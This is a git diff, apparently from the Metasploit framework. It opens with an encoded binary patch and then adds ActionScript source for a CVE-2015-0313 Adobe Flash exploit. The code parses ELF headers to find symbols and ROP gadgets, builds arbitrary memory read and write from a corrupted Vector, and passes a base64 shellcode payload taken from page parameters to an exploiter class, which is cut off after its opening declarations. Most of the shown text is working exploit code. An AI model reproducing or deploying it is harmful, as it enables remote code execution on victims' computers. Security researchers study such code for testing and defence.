zJ4`jz_YD_MC?0h414PX(jSdHX23K&zNRr#Y-p5#?e~8uW#|F#`XBpITU}k@Fg-WRl
zcS!fvkaogL8)F|Y+97y4=iXsb=lR`Cjq-0wJ*P5A%DT>>r9VIC`XfZxVN0pBmH8%;
zGO1dX<*UO^IMm-KcUf9k-8dg7R?hD~K@|XFlBc$oR3d$sQON6C>kN#9EKBM!GEy;W
znsmp-f7=9>ky=n{(qN#Y;ylq?gDXXy*De+~`tKx{dAkQvSNlCay<9p`=E#?T`Qs|S
zXTbSz1(A_(TAP1G{UVd+5u+zgxWT!zC$peurs*&fBiz|qWR>sqVKXFJW#9}`7G;c;
z%xL%kaqAgyyilLrzlP57Pn^Ca#`R(pMn5cUe>_=td-6%JYXRA5T}#(NT1y|6MHveI
z!E9l1%K2sm1|PRw(+7(pEvXszP0Pm|93@r>+_I{)Z&)j{O9lmY@kJ2blIBH8MJ@w7
zgXt&X*!T5)4fEpgeonG}ZuNt!PitZ2@`#V^e0)WYf(2SFpPH=mJp+fStiKc;dU}qk
ze~C#JKQoI<H(}~gs%$i&=h2+PEk9h4!ARd|q@?!??|n;xff{C6M+vgwPJ_Y=vuB6)
zIM*MZH#nG9xhEGW=J`jvU13~dI`-|KaqT;MZSrhpn_!LLSq6Qd#gLX3PkP9?XpL_Y
zi;sG6J@)iirYmP3s<vP3{I1ij_Zn}Kf0da@H)jlqcgwPM>8GUjNmCDf)~`aIq@DG2
zw`3De+#<H_X92YmX<d+VbtBfgCp<11(2N;bC;;D!^UXY8(3I(<uNUFHidxQ*^+brk
z8+_T7lMwRiV9#{+b%TRyBeBvzQ~x@wXHnBXBTRovVW)mm89|F;%wCLHJ$6;Qf8vo=
zFa5x4In-%IpK6e(EXMI%_M<M7WT6RH7>_f3VCmdz>BM~DEh^s-AP1XvQhZr1H0l`|
zi;WRuEW5lJxb~>OExoQ`@pf%h7;XHgbIK4bF3g|#=fehYVT(mtF>Zp%sTO-)uBm<I
z>wJ5{pKbVD>Gm~60oiXxZFk%Zf3za3L02~40)IC?#6;`N``u%&_c*kqupIEFV&*R|
z%3;KjXP6*3<oouu+4}&<hutrl=x*zG+|#uRb+Lt)S!6p#@6fi~=ES;Q!E-jVj6G$Q
zfqHQyske1&F@lL#Fe4&u$qBLm0@)>nH3{m4v{y?I>o%CrULNF2(=u?0e}hK^$|XGC
zRzZ5KHIXEg^$^n2kb2(-u--^a=&RqGi^#_i#c^EW^CFm@OgK&RXx_K8cWxRrtRy_f
zAz`}^G!Qm9M|SicQw#&&68@Au9!AuP3YCZ`EQ%9l2b6nM$vW+8!_q|^DM3p`c#_qh
z<-huM(g6=YuL*1jOPL(Be+3A%G*c`HfYU3BeLlR*B%?~9f=nW2_gPjcUnqDkLQ=kn
z9X;=@b~OS!x=xeP@cEGuntsqu9_IG^2Lb?@dO{y$(oK*W(748Ed)_*eCYFeThEJ#w
z-)|ahsEGdUOK99NU7FeNvt3BOc%XV$$v(Dl_(;^is*>*r)mkaTf1Y0Q!_LnSUg|ed
ztrGWCd^lSz27d%|r3&tNaWf{qs|i&N?(DowK2ETLI5VB1$l4dWno;e})7MMyU3Rau
zQ&zE1aM*u(<P=b`yjL2x-$Tpt@=Yf&BLnLxmB)jTzK)w1743NWnmpnoV2i(3;JL;t
zO7UGrpD_&<0r8V;e}NbE_LtVP<w&k}!TG%$u{WY%5di2L!Is+gERAzkbzm;3g7KGh
zy*vK^2=aQDZeCb>8FQdX9Byj;=XJTDI0uX!vciwR;6C;stlF*$R_Q`L8#0iF9)4&Y
z2hMKk!j_K>#Sp(vl|#(r@7t{kP?NJW99z|sLA@4nD|erpf1Nb6(2<F&VlZYZud3XL
zc@6Srh2i3!C0s820Y3w0{-Oa`hlw}=YQeoTcKK`UK@CN3To6UqnKj)3LG}}AO>`B7
z>1|_+@BIOPe)hm~+K!}}8YSe&B=_A!K?tCRL$)EHKkL%MphnbCeP$Fpw>xihjpAlh
z5Ag2&hKu9ef7O%<8xW-Wv^}&7-JSa|t>^UW2fn`Jb=w&1Nj~W0L%(}>L<1w<IC2}%
z3eB}PZBw4vaj)>EP0<-J70lJ23o%8?LubF8!8CLCl6+h|ySX0f(yzgMeWzB&H3MIm
zZGMGE6!(QQ4K)xPg1ZFx8MnD!V0}nnPBM-iHqrJrf6z-iLg<}3Xdzf}(E0sKy%mpq
zOnhz<(p9?>j5|(=wS1Oy^Qq`#aK8-?$dOa<xJ8kAf04M2dTF)E3#@{U`Cqle&?O(q
zXY8syUZQdSoFVMqkOU!)X_sfO#~7Rfq0f`ea0QiuXmW0jzr{Y;R2DPVqu8BcgR`vJ
zPXN|ke<Q;-Pnkd`ak9-&%Yd{YTmlJx(2Z!{3#LH{)48hm$C(=upuI})SgWQ{c3s*$
z%}vD0sKftCOvB-FAA<`yxA!*8*!_*bX^49!>go>GX*`Cjjia<U#vb4vt<OJ!2({5p
zHT(G@t*{oQIQ4pL#YY-F)vmg9jM(sA1n=pPf1@;@Ea}_#7hy0|+hRBEP=GKkbeSdr
ze)FY1X})4wA0VT;{8TbE?UOv%Q(16jr*%ShUSFoayeZgSw{ujTt&X6Dr9xC>vOd>0
zcKsXvj7NQy{*}xiE|7L-O<3gfcAHb{<)%xI<7WVxm<@b=`_XQuHjvS>=y;YZ`XQ^<
zf78ZIwza93QO_+!z1{WqfZu|x1I;tvMLZA@qWgqI4pLT?G_b!5*=oBih`8_n`6TSd
z2RmlJ%%e${{Oy;|FTdHg(!(4{G$dB7trz9u$`;ijq&L?3x2=oVyVGF@4gl3(>A5yl
zAs`>{XOfd%u4O2zAVW@K$FXm<%Yf$XfBf23Ymm%IFvJz>c%;K>SI;U0PH@Ibd!5^C
z@0s`qSxi?})qHUnTa6kocd315vpvQ)rQY3B_?olbWS7|#<lw&vOA@Tv|KMierYHpL
zMUqOw=b-WH5tGTXdj()^H)b!0MkTBJD%wfn$m}NFrO5iT>O~E#CI&8paaPSMe+mwX
z1ji$L9%=dC|2943U{m(!n<cW^NZ5BZ-MqMbbc%ZQAQmm%e%ArWDYw;eu@i0r*m$#h
zWC^I$@DDk5j$#<`U_<zy%6wEeCIITe4Mhj-I#x2kbuB;!Y<2)1|6<736j^W&iS-wF
zgvND{iR)>b1WAZI@43F1`FM)we>Q*%mLHr}r5Ry>@H1BnzSWl;V7r1>vM%aG_9WXc
zMbL2&pBoqU_9#Lf)FQ$d!FP}~?@<xXO*{1P!Ni?i2!)-7tUA!qldyYqn|NwmxXW?B
z%Ul8j&A_^BdL}w)ld$Mym}rO=%zcvMMTJ_%)2MkIlxl^pp6`vhl=-KtfA!O0Q>3=-
zWvbql4JtqiKtQ?3ArSqb$8Eo&QFj&uLtvL39ea<5pco2f>B-050nO~z#G_M&sfspO
zj-puGYUm?pahb~rpVkC9wX<o4s+tcVhNby%q2XxDZwWibA@U>m7CQa;aAx}mE?~_~
zbZ}A3BsOR!>KCHm`<H*he;|d%r|MhThT#F^*h?XgYN?k|sqB)@=nZ?NucxFN<wuGL
zX-l21`5oO*Fe7-tLHb_>W{?h>20unxI_h4Yx50eF96nW=r)u!7TvP8ivdYr%TM!aA
zIL2l&RQS0jMh2;K6Pp47LwZIDM5{VJsTtz!ZvJd1W?&?ipoU_Ne?R>ySz6GW*H-HC
zF&;U~t9T;)kK=smP$&rxrIlne#$F8-Zr<x&cE7^uZ1L&P-`f>qADnj+lprZO%2rQ3
z9n^16OIr=3BP7|kUf7CuH)_XQ-$k9cI^(YhDmY09%;_dSLSdAH5N<<};8W<n>o(yJ
zs(4V3B9ZtdKE?#of6bs%fgz4cb-kUdD>VH79nC(pdAKeE6`4OiM5F6a+1iQ$W^o9i
zo(&`*$xOgK0O6$7Hg2>1W;Fnm$8Fk8p6@xuo(l`z=8KvPy=n%cBLbHHdS8w=`O~I7
zv6<W*MlwLwJS#V;LT13f24l<<;{?OCrGpSYVW9G>I$AC9e@1SZJBTSoav)x1gtPna
zf`s^Z1~vlxXYDK}DM^HBbET<QQ9PlzD{s>L#il6J(3cUN0h~L-ezmnI5SY~Q8;Ob=
zO%;%{!~WL966)U_fQxz5eGyu^eWf-NAV=KiG5Yx9TRexST&N}U=Bqgp@o;b1%1r92
z@M_9hQV>0If3V}!R|7ExaCQD!25JJ2V)JtA<FJHW_pm4#|DDA{t8@v8b(=Fx=+LAL
zYiMRkbu~Trhs)%kuvJ({B|%DzMwkI_ZlYil`g1?oc5#*kseloo>Sm<o4~a?B8;~@6
z7D?mzVhMeCJN!83&uvwn@mrM56JZ5wdfZO$3+(%2e^ycu<!S%Bs#w@vT7H$5{np_z
z?4Sdka*;>DB;;l{??doYa94nbN+H1C_%nuzg>M0B29GlUgRaI%AHWSdr}O$1Y{!3L
zk9dR@uNU~3N1(NPquADA1G&BnRl227`2N?XU7%Rzua%>X#WC)ybq&qL7skCJ6+piT
zCMSN>e~e#0Dr^;L(Gq$DeVo{A6ztYYd4E|%Ti3!<X|&Fcm<KplvwBZgDkTWCQn3?A
zdjJ@E#pxx{ZDv9x>?3zrQFN5Re#2W1-A9OCXph-!d!+%kT9QqHwmVO4_9hbqetaN&
zNBqAmtAe*sHuQpwCaCY<RDCk%Na@MY_yV-0e_kzEhdw@&^RD(`*g&Kau{IMWakvZw
z>s>aXe0bD}wah{FD8AXRp}>92yKX6QV*catjH&nO$dWL(ki4yP?0y_OB>AjJNDz2C
zFN!;fXwzN(21ZY<td;joO2*j&OHptdV%0C(J-uKdFLTq4XpxHTO2*#%^(UjKr>%XD
ze=FWzDAeVyq9X=MAY6a-$TLB9mp%G=ok`0Dvykj|)G0x|ir#^j7qvDZx<higI?d~>
zr?I#AZ>~6+w37S{+Ar75j$q(q*#q$+y!TF@3;aiVHS+MP^o;PfMghz4X=1~fLA6~x
zw~lye*Yv_|isrNI5;0-b0OqT@oi?M?f5sdr@J!Nrotlmk^@Sisl41kJ0xdbrU#B4{
z<{U$0o56Qq(u|Cl;A<fnnstO^U)~<|by*!H4`5Div@)VNt|1^?!LsSKdKFl8#?>Z0
z*IFSP(;O*H<Xkq%t}@cqtv#)>)V&xCQN*vXLiQtl=zz2U3o*z;3Kt}3c2H;rf0N)m
zZwO($OiwIEr$o^c%0sZfL=5?1cwMZji-)`Nv$D5Sr$`6O2CHbGw1TgZT-LF4LK>64
z^IYpw&{Fx?7^7zIU-p13ur$Vzh3YA_C;l(nyUek}sP#J*?FY<T+Y(^&z(}kDQu3Px
zHXWvm1I?LTgj0@#pZqM!vMmmye-D`$NPXCl)JnMYjb+V)yw(FMA?q0olQr>eWptsa
zyY;>lL~~r!1wo}&FSJbV&?RjJs$TnK2gZQkCZp)uGs=kzn#Cw=1H-S%2<B%GkFl^I
z#$u}+PLk+R2n2YYJ|^bitQ&0ER4NR1)Oo@bW?8B=G7NtO1OWu{6_eE2e;X+;)N2}c
zA|%TYm=3x`iC0f$lef_)yU;PQUXN`g<|S?4`fdGL!p=?EQjy#W5>M_wlq37jA+i85
zgs?R|GUV9ONIMGFAnjE8vt-yi8Q5S2KGeI`4hXhenOgIgIqsI7*rgkEAV~<eP8kx9
zX#-Rd9MzDu#Xu(NCf5K{e*tRS$%+CUpeliGs@l}T3rU-gL`(^us~5xMvnh_&bQS@7
zcNnOIJVkA?msX5wpHiiFTnZ@W*nmdNV!iwd<T=He6N`A#eciQ%VqL_4B75Hn_5lM-
zHW-b}<HDOF3KxlZm<_CsWqRZz9ZNlo57nf#`9W|#y>jM8F~W|6f2-JW`Oi~p5zQu~
zOhk~$y=8`*j=8wvKM3vlqg?e?9V#&QwzCbbXz-RY5SH~jadZ@<pf#2e+9g8}M7My6
z5uWI9&him-%;5T%!@2dgj~ge|QC*#9)&;>}vET#06e;Qw^Wl2;am`(CFzt15J82vJ
zXcv<PHEN~0MP5e$e^_YY-8&8M(ETpH-hx}eG(7YS>Z@g@!J+6MHIQnP%M^1cjfeqz
zV)UN1RE3NQF0D?uLWq935gWwBDTE(A8CsKd!QmcIbb|!!y_M$a`mG)2hIQrFK057?
zpH{i7>Sp!y31uzWRb?e2<?|e5O<_<pQ&fWY3<f{(KE&Fxe?vM2sBYmT5hYbaguQZ@
zQQ^j<6vgXBhZK&Xdd4t2NQP39&SrM38VYPqzr}gdKP^4QT{~8T(GyPBghv}l&l_Jv
z|J2pot{G-W(2UJN+ed5;PBF;kX_17K1x54+Z(BNw7lHE<3QJ;<XU77ix0gJZ$E^=v
z({y4Q6;bfxe*?uFA|=?{iBm>qMmzHfhu}UEm1vYcPr-!URN-Fqs&h#smxqL)Ibomc
znj+9;*na?9xG)s<@dlMt?CnnW++!zy)K%9wbay+(zZDQ?lZttDrKa_}3km0y_3?E^
z)Wki2LG(03%N^v{$*qva&^B>5fwS<lvO!9w0lNi6`f8dv41Zk=TQueQuI9#Z*}eEt
zts3u(bbr0VY2n$~s`+ynEU9+LDjJmJ_#!K5`G0qcN6yluQctKhus$D@Ml1FdoZ7))
zN<W*iCXfWIe0eY53i7e7x*ff;$y43}BDP_5QuUPrJO1(RYcuCWds5yrplpoUU?%Ll
zaEhKsGX`fC!hbDGpdnXTbH?|4c0@AQf2N18VOM7i^WjS=aPIe>!p|_xCQP-7Z=nxW
zmB`&T;}EL!GSXL&Z=Kn=QTMo}`**tFcU90vBuUS=7pfzn$;gl0>jl`3ck(##=~wLN
z?OIDaOV#PKt<h9_%0ybxf<e~DpvveV%#X(Rt^|Ka<$ts)F{i2~2ooa#`TpM#LV|ry
zED}J0KU(MnU$t$hxr!Ujdrf{H&s}+c#m?7QK0UNU!!v7w=hcUL5u_W0NRupGlY7FB
z@PR$A{h8?CU7_9?dsr_EIdiUwb`YJx($%-{^G7E?z3v7|oM4BwRIC6|Fq6GYUDq&D
z<KXiFmw$!67)p=<Z{wRl7gb*QxEHS;*ikN3$Bd9BB3CW}%2(ye2s^F2!(}i+Bj*Q%
zB0rH}DTY<857aO=dS9*A^4!wXa)Yn&khQW?#HIJb>y1OZ${=%{GL<fGew%|m!lqx`
zBOSgvbMs~Xx0R@G@-uBTi6f@C7cFGB?n=o?)qj0sA*RF1T|5s-EuAp2>2-7kTE`;Y
zY4&npf63B&c_Y1*(10=;l!{Ee3IRo$dnXCz)3t#3A7t5$4uXM^AN%58>kO+pon;Ni
zRKB?b*!<-v&~zXZ2)KLk%{}3w%_Xo_UKO&q1qV&70l3F9=ciGJgg_Gpx|P+_({?cK
zp?{Ro(!;Tp&&KTVx$=nCJA9>+(Z)Z2a!fL)WIKNE;J>n9-Ss*g+~)m9<}BG&s^OI{
zr8h#VoF~~SAwny2agZ8<B}{&8*=K0)UWX}D2hJx23J%`=UL=NuU$7NSo;E#TgU+}_
z0PU}um3^`k&tU;zwNXnc+S$5G*>ktmRe#;Pa580g)&h;nsC5~z;xOwzxDN^WdWCMR
z?skQp)z!TG#pYw{j-3%Cd#skL0*y|MNxx1kEeMs!L-GQ)UpewOLj>jI+mdoxnc3=o
zHJPknFqW<8n1xKYS9Lf#KKlPKQ8?CeccK4X6+*}^@6C7Bi1XVSYvze6F|7ypCx0W{
zPX;#Wee|@aq;Dqft}*={G&;4uD(+VmSh*~?DS8!`j9O?d5ItlRb@&i+??GX2Uyj&v
zvf-KUjWN8c0Hff&dTTPd-?eYP6tv2uu#eJFVQNg_9stL*TM^PvE=+(*ZX5{=>`M*L
z6zxI503I-=!{wvD?EdaAAjpz+1b_V_lssSzlPD}!>xSn;{2*3T4HvUsuq51(Ym2=@
zm-9EOpy%~(q{BdqoMdeq)*Npi;{lu>PCzPHW<}wO&wUTjVn9p9@Xk?k)N?lXM2>oS
zVBorrcZ~iAui@xv83Vt`=bftU!l%wZBiOA;-_6GGAZK-L9ExlgjvKwLeSbmF-k}k<
zBL{&f3NiT>?8TAqGRziq!=R-QiXFjH97qhYm`BaV(;HF{%6p|5Zi)b_9R~HKAJWqo
z8k^f7!~fW~CBwxz+H;{PNh21e;&61p@LXngu&88+6Za0rW`I2c6(ZY4snQNs0FJM%
zHMk+(P>)-#9YAx^zF17pMt^(S^QACf(?VwDU{PwuLmOVzpJMb<c@;@|BQ*Dc%^&6u
zw57?hCDCYSOf_DlF4ugHdWV4z`V0enm13`B*p4{oC0<}``f@HD!=x4j>`Xymc6sTL
z!RVt>$CK`r^(rX@s~;zdjFD$Lo9tz^?hkIsaN_E|JK^e3B^0_bT{d2ia*BK4t_nL5
v2k9Ou00DbExxXUD95$KOCUK)EIm1Arjh(VT)SEP^OU@i5!=Cs5{w7Y!o590S

diff --git a/external/source/exploits/CVE-2015-0313/Elf.as b/external/source/exploits/CVE-2015-0313/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0313/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0313/Exploit.as b/external/source/exploits/CVE-2015-0313/Exploit.as
index 6c978e8d90..9ff5edcd8f 100755
--- a/external/source/exploits/CVE-2015-0313/Exploit.as
+++ b/external/source/exploits/CVE-2015-0313/Exploit.as
@@ -21,7 +21,7 @@ import flash.system.ApplicationDomain
 import avm2.intrinsics.memory.casi32
 import mx.utils.Base64Decoder
 
-public class Main extends Sprite
+public class Exploit extends Sprite
 {
     private var ov:Vector.<Object> = new Vector.<Object>(80000)
     private var uv:Vector.<uint>
@@ -29,9 +29,12 @@ public class Main extends Sprite
     private var worker:Worker
     private var mc:MessageChannel
     private var b64:Base64Decoder = new Base64Decoder()
-    private var payload:String = ""
+    private var payload:ByteArray
+    private var platform:String
+    private var os:String
+	private var exploiter:Exploiter
 
-    public function Main()
+    public function Exploit()
     {
         if (Worker.current.isPrimordial) mainThread()
         else workerThread()
@@ -39,11 +42,13 @@ public class Main extends Sprite
 
     private function mainThread():void
     {
-      //  var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-    //    var pattern:RegExp = / /g;
-  //      b64_payload = b64_payload.replace(pattern, "+")
-//        b64.decode(b64_payload)
-//        payload = b64.toByteArray().toString()
+        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+        os = LoaderInfo(this.root.loaderInfo).parameters.os
+        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+        var pattern:RegExp = / /g;
+        b64_payload = b64_payload.replace(pattern, "+")
+        b64.decode(b64_payload)
+        payload = b64.toByteArray()
 
         ba.length = 0x1000
         ba.shareable = true
@@ -60,7 +65,6 @@ public class Main extends Sprite
         worker.setSharedProperty("mc", mc)
         worker.setSharedProperty("ba", ba)
         ApplicationDomain.currentDomain.domainMemory = ba
-		Logger.log("starting...")
         worker.start()
     }
 
@@ -84,12 +88,10 @@ public class Main extends Sprite
 
     private function onMessage(e:Event):void
     {
-		Logger.log("[*] onMessage")
         var mod:uint = casi32(0, 1022, 0xFFFFFFFF)
-		Logger.log("[*] onMessage - mod: " + mod.toString())
+		Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
         if (mod == 1022) mc.receive()
         else {
-			Logger.log("[*] onMessage - Searching corrupted vector...")
 	        for (var i:uint = 0; i < ov.length; i++) {
 	            if (ov[i].length == 0xffffffff) {
 					uv = ov[i]
@@ -98,10 +100,10 @@ public class Main extends Sprite
 				}
 	        }
 			if (uv == null) {
-				Logger.log("not found")
+				Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
 				return
 			}
-			Logger.log('whooray: ' + uv.length.toString(16))
+			exploiter = new Exploiter(this, platform, os, payload, uv)
         }
     }
 }
diff --git a/external/source/exploits/CVE-2015-0313/ExploitByteArray.as b/external/source/exploits/CVE-2015-0313/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0313/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0313/ExploitVector.as b/external/source/exploits/CVE-2015-0313/ExploitVector.as
new file mode 100644
index 0000000000..9fcbb01f7b
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0313/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 1014 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-0313/Exploiter.as b/external/source/exploits/CVE-2015-0313/Exploiter.as
new file mode 100644
index 0000000000..b371c51895
--- /dev/null
+++ b/external/source/exploits/CVE-2015-0313/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(89698)
+
